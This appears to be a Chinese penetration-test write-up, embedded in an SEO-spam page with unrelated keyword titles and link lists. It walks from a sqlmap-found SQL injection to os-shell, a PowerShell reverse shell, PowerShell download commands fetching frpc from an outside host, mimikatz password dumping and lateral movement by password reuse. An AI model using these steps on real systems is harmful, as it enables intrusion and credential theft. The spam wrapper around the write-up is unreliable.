当前位置: 首页 > news >正文

视频网站备案流程图东莞seo网络推广专

视频网站备案流程图,东莞seo网络推广专,路由下做网站映射,wordpress发邮件插件一、漏洞发现 拿到登录的接口,丢到sqlmap里面跑一把,发现延时注入 进一步查询,发现是sa权限,直接os-shell whomai查询发现是管理员权限 os-shell执行命令太慢了,直接进行nc 反弹 执行base64 加密后的powershell命令&…

一、漏洞发现
拿到登录的接口,丢到sqlmap里面跑一把,发现延时注入
在这里插入图片描述
进一步查询,发现是sa权限,直接os-shell whomai查询发现是管理员权限
在这里插入图片描述
os-shell执行命令太慢了,直接进行nc 反弹
执行base64 加密后的powershell命令,反弹回shell
在这里插入图片描述
nc shell下加账号和密码成功,mstsc远程连接发现失败
初步判断应该是在内网
配置好frpc.exe 和frpc.ini 将其下载到目标服务器
powershell (new-object System.Net.WebClient).DownloadFile(‘http://ip:8888/frpc.ini’,‘frpc.ini’)
powershell (new-object System.Net.WebClient).DownloadFile(‘http://ip:8888/frpc.exe’,‘frpc.exe’)
./frpc.exe
在frp管理页面看到目标端口已经上线
在这里插入图片描述
接下来进行mstsc远程连接
在这里插入图片描述
使用mimikatz 抓取其密码,直接报出明文
在这里插入图片描述
通过arp -a 发现其内网中还有一个活跃的服务器
在这里插入图片描述
直接在目标机上用爆出来的密码尝试远程登录,成功登录
在这里插入图片描述

二、总结一下思路
1 、找到sql注入,且是sa
2 、通过os-shell 反弹一个nc更容易执行命令
3 、发现是管理员权限,直接加账号,如果不上,可以考虑通过msf 或是cs去提权
4 、查询发现3389端口是开的,但是连接不上,考虑可能是在内网
5 、尝试通过frp或者其他工具将其3389端口转发出来,再进行连接
6 、登录成功后抓取用户名密码
7 、通过arp 查询相关的内网中的通信和路由
8 、尝试通过6爆出来的账号密码去碰撞其他内网机器

http://www.yidumall.com/news/77215.html

相关文章:

  • wordpress免费搭建博客宁波seo教程
  • 河北做网站的公司万能搜索 引擎
  • 做网站遇到的问题百度网盘资源链接入口
  • 影音先锋资源网站建设北京互联网公司有哪些
  • 海南自贸区seo网络推广经理
  • 广西 网站建设求网址
  • 如何注册营业执照什么是seo?
  • 做爰在线网站网络营销策略研究论文
  • wordpress多文章杭州网站seo
  • 小域名 网站备案外贸推广平台排名
  • 沈阳疫情最新消息今天封城了seo网络优化师
  • 民治营销网站制作山东seo多少钱
  • 做网站专业服务平台推广渠道
  • 分类目录网站有哪些培训机构招生7个方法
  • 网站做管理员消息推送企业网站设计的基本内容包括哪些
  • 天津城市建设管理职业学院网站国外黄冈网站推广软件
  • 信阳市住房和城乡建设局网站站长工具综合查询ip
  • 石家庄网站建站厦门百度关键词优化
  • 明年做哪个网站致富谷歌seo搜索引擎优化
  • net网站开发技术方案东莞今日新闻大事
  • 聊城做网站信息苏州seo推广
  • 专注于响应式网站开发优化大师电脑版
  • 北京国贸网站建设登录百度账号
  • 中国建筑装饰网下载东莞网站seo优化托管
  • 微网站建设报价app拉新推广代理
  • 做写真网站违法吗宁波网站建设推广平台
  • 怎么用qq邮箱做网站女生学电子商务后悔了
  • 网站建设方案书模板下载企业网站推广的形式有
  • 什么网站可以接室内设计做精准营销的概念
  • 泰州网站设计软文范文大全